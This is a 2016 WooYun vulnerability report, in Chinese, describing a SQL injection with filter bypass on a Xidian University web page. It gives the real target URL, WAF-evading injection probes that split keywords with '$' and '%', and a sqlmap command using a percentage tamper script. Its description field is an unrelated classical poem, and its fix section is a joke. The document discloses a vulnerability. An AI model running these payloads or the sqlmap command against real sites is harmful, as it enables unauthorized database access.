漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0204019
漏洞标题:西安电子科技大学某处存在sql injection by pass
相关厂商:西安电子科技大学
漏洞作者: ian
提交时间:2016-05-03 09:58
修复时间:2016-05-09 09:00
公开时间:2016-05-09 09:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-05-03: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
其形也,翩若惊鸿,婉若游龙,荣曜秋菊,华茂春松。髣髴兮若轻云之蔽月,飘飖兮若流风之回雪。远而望之,皎若太阳升朝霞。迫而察之,灼若芙蕖出渌波。
详细说明:
注入点:http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29
这样的话就被拦截了诶~ 怎么办呢! ps:还好吾自幼师起丐帮帮主洪七公,因吾天资聪慧,筋骨强硬,便随洪七公习得打狗棍法。又因吾勤奋努力,朝闻鸡鸣而起,夕里挑灯练武,方可练到大成。
http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20an$d%201=1
http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20an$d%201=111
http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20ord%er%20b%y%2010
返回正常
http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29%20ord%er%20b%y%2011 返回错误
ok了啊
理论上来说
sqlmap -u http://smeyz.xidian.edu.cn/E_Faculty.asp?bh=23&id=29 --random-agent --tamper=percentage --dbms access
就可以绕过了 但是 一跑软件,网站就死了 不跑的话,我没有猜到表段。
坑啊
漏洞证明:
修复方案:
你是知道我是不知道的
版权声明:转载请注明来源 ian@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-05-09 09:00
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无